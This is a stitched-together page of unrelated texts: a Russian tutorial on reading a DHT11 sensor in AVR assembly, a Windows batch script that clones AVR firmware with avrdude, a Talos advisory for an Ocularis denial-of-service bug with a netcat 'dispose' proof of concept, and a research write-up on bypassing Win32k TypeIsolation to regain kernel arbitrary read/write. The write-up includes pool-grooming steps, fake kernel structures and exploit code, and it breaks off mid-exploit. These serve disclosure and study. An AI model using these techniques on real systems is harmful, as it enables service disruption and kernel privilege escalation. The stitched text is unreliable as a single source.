Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

CYCLES: .byte 80 ; буфер для хранения числа циклов

И сохраним все считанные циклы в память.

;============== READ CYCLES ====================================
; читаем биты контроллера и сохраняем в Cycles 
READ_CYCLES:	LDI N_Cycles, 80			; читаем 80 циклов
READ:		NOP
		RCALL EXPECT_1				; Открутился 0
		ST X+, Cycles_Counter			; Сохранили число циклов 
			
		RCALL EXPECT_0
		ST X+, Cycles_Counter			; Сохранили число циклов 
		
		DEC N_Cycles				; уменьшили счетчик
		BRNE READ					
		RET					; все циклы считали

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; если регистр данных пустой
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; то шлем байт из R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - что слать, USART_BytesN - сколько байт
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

;=============	GET BITS ===============================================
; Из Cycles делаем байты в  BITS				
GET_BITS:			LDI Tmp1, 5			; для пяти байт - готовим счетчики
				LDI Tmp2, 8			; для каждого бита
				LDI ZH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI ZL, Low (CYCLES)	; загрузили младший байт адреса Cycles
				LDI YH, High(BITS)	; загрузили старший байт адреса BITS
				LDI YL, Low (BITS)	; загрузили младший байт адреса BITS

ACC:				LDI ACCUM, 0			; акамулятор инициализировали
				LDI Tmp2, 8			; для каждого бита

TO_ACC:				LSL ACCUM				; сдвинули влево
				LD Tmp3, Z+			; считали данные [i]
				LD Tmp4, Z+			; о циклах и [i+1]
				CP Tmp3, Tmp4			; сравнить первые пол бита с второй половину бита если положительно - то BITS=0, если отрицительно то BITS=1
				BRPL J_SHIFT		; если положительно (0) то просто сдвиг	
				ORI ACCUM, 1			; если отрицательно (1) то добавили 1
J_SHIFT:			DEC Tmp2				; повторить для 8 бит
				BRNE TO_ACC
				ST Y+, ACCUM			; сохранили акамулятор
				DEC Tmp1				; для пяти байт
				BRNE ACC
				RET

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.

Определения

H10:			.byte 1		; чиcло - целая часть влажность
H01:			.byte 1		; число - дробная часть влажность
T10:			.byte 1		; число - целая часть температура в C
T01:			.byte 1		; число - дробная часть температура

И сохраняем байты из BITS в нужные переменные

;============	GET HnT DATA =========================================
; из BITS вытаскиваем цифры H10...
; !!! чуть хакнули, потому что H10 и дальше... лежат последовательно в памяти

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - перевести на счетчик таки
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили
				
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				RET

После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

PuTTY с данными

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

;============	MAIN
			;!!! Главный вход
RESET:			NOP		

			; Internal Hardware Init
			CLI		; нам прерывания не нужны пока
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; Init data
			RCALL COPY_STRINGS		; скопировали данные в RAM
			RCALL TEST_DATA			; подготовили тестовые данные

loop:				NOP						; крутимся в вечном цикле ....
				; External Hardware Init
				RCALL DHT_INIT
				; получили здесь подтверждение контроллера и надо в темпе читать биты
				RCALL READ_CYCLES
				; критичная ко времени секция завершилась...
				
				;Тест - отправить Cycles в USART		
				;RCALL TEST_CYCLES
				
				; получаем из посылки биты
				RCALL GET_BITS
				
				;Тест - отправить BITS в USART
				;RCALL TEST_BITS  
				
				; получаем из BITS цифровые данные
				RCALL GET_HnT_DATA
				
				;Тест - отправить 4 байта начиная с H10 в USART
				;RCALL TEST_H10_T01
				
				; подготовидли температуру и влажность в ASCII		
				RCALL HnT_ASCII_DATA_EX
				
				; Отправить готовую температуру (надпись и ASCII данные) в USART
				RCALL PRINT_TEMPER
				; Отправить готовую влажность (надпись и ASCII данные) в USART
				RCALL PRINT_HUMID
				; переведем строку дял красоты				
				RCALL SEND_CRLF
							
				RCALL DELAY_1200MS				;повторяем каждые 1.2 секунды 
				rjmp loop		; зациклились

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

Ссылки по теме:
AVR Delay Calc
Как подключить Arduino для программирования в Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Код примера на github

AVR(Arduino) Firmware Duplicator

Windows script to make an exact copy of AVR (Arduino) firmware including the bootloader, user program, fuses and EEPROM.

Things used in this project

Hardware components: Atmel ATmega328P-PU

Story

Code

windows_read___copy__xp__vista_tested_.

Plain text

windows_read___copy__xp__vista_tested_.
REM
prompt $G
ECHO OFF
CLS
ECHO.
ECHO BATCH COPY ATMEGA328P-PU VIA ARDUINO-ISP ON com4
CD C:\Program Files\Arduino_105\hardware\tools\avr\bin
ECHO ENSURE MASTER CHIP IS IN THE READER
ECHO CTRL+C to abort OR PRESS Any key to begin copy...
ECHO.
pause >nul
ECHO Creating hexadecimal binary files of ATmel328P contents...
>stdout.log 2>&1 (
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U flash:r:%temp%\backup_flash.hex:i
ECHO flash has been sAVED to backup_flash.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U eeprom:r:%temp%\backup_eeprom.hex:i
ECHO eeprom has been SAVED to backup_eerpom.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U hfuse:r:%temp%\backup_hfuse.hex:i
ECHO hfuse has been SAVED to backup_hfuse.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U lfuse:r:%temp%\backup_lfuse.hex:i
ECHO lfuse has been SAVED to backup_lfuse.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U efuse:r:%temp%\backup_efuse.hex:i
ECHO efuse has been SAVED to backup_efuse.hex
)
ECHO Hexadecimal files created.
ECHO.
CD C:\Program Files\Arduino_105\hardware\tools\avr\bin
ECHO INSERT THE NEW CHIP now!
ECHO PRESS Any key to write new chip...
pause >nul
REM Note that the path cannot contain the drive letter "C:" so you cannot use %temp% as previously
REM Reference:http://savannah.nongnu.org/bugs/index.php Bug report #39230
REM.
>>stdout.log 2>&1 (
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U flash:w:\Users\owner\AppData\Local\Temp\backup_flash.hex
ECHO backup_flash.hex WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U eeprom:w:\Users\owner\AppData\Local\Temp\backup_eeprom.hex
ECHO backup_eeprom.hex WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U hfuse:w:\Users\owner\AppData\Local\Temp\backup_hfuse.hex
ECHO hfuse WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U lfuse:w:\Users\owner\AppData\Local\Temp\backup_lfuse.hex
ECHO lfuse WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U efuse:w:\Users\owner\AppData\Local\Temp\backup_efuse.hex
ECHO efuse WRITTEN ... this may change from 05 to 07 with BOD being disabled by AVRDUDE
)
ECHO.
ECHO Chip duplication and verification is complete.
ECHO Starting Notepad editor to display log file.
start notepad C:\Program Files\Arduino_105\hardware\tools\avr\bin\stdout.log
ECHO.
ECHO Press Any key to close this window...
pause >nul

 

Ocularis Recorder VMS_VA Denial of Service Vulnerability

OVERVIEW

Talos is disclosing a denial-of-service vulnerability in the Ocularis Recorder. Ocularis is a video management software (VMS) platform used in a variety of settings, from convenience stores, to city-wide deployments. An attacker can trigger this vulnerability by crafting a malicious network packet that causes a process to terminate, resulting in a denial of service.

DETAILS

An exploitable denial-of-service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate, resulting in denial of service.

The VMS_VA server process is listening for incoming TCP connections on a port in the range of 60801-65535. When a client connects to it and sends any unexpected data, the binary will respond with «Hello World!» The binary has a check to see if the receiving data starts with «dispose.” If it does, the server process kills itself. There is no authentication required for this command to go through. Any attacker with network access to the server application can use this to execute a denial-of-service attack.


Ocularis Recorder VMS_VA Denial of Service Vulnerability

JUNE 5, 2018 CVE NUMBER CVE-2018-3852

Summary

An exploitable denial of service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate resulting in denial of service. An attacker can send a crafted TCP packet to trigger this vulnerability.

Tested Versions

Ocularis Recorder 5.5.0.242

Product URLs

https://onssi.com/

CVSSv3 Score

7.5 — CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-250 — Execution with Unnecessary Privileges

Details

This binary listens for incoming TCP connections. When a client connects to this binary and sends any non expected data, the binary will respond with «Hello World!». If the server receives the dispose command it will terminate the VMS_VA process.

this.tcpListener = new TcpListener(IPAddress.Any, 60801 + ConfigID);
Thread thread = new Thread(new ThreadStart(this.ListenForClients))
{
    Name = "VA CommServer V4 Listener"
};
..........
if (str.StartsWith("dispose"))
{
    this.Running = false;
    bytes = Encoding.Default.GetBytes("Ack!");
}

The binary has a check to see if the receiving data starts with «dispose». If it does the «this.Running» variable will be set to false which results in the process killing itself. There is no authentication required for this command to go through.

Crash Information

N/A

Exploit Proof-of-Concept

$ echo "dispose" | nc -nv 192.168.56.102 60801
192.168.56.102 60801 open
Ack!

Mitigation

This vulnerability can be mitigated by not allowing VMS_VA.exe from accepting inbound connections. It is unclear if this will have any adverse affect on the Ocularis Recorder module as the product documentation explicitly states to allow inbound traffic to this binary.

Timeline

2018-03-05 — Vendor Disclosure
2018-06-04 — Public Release


 

Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

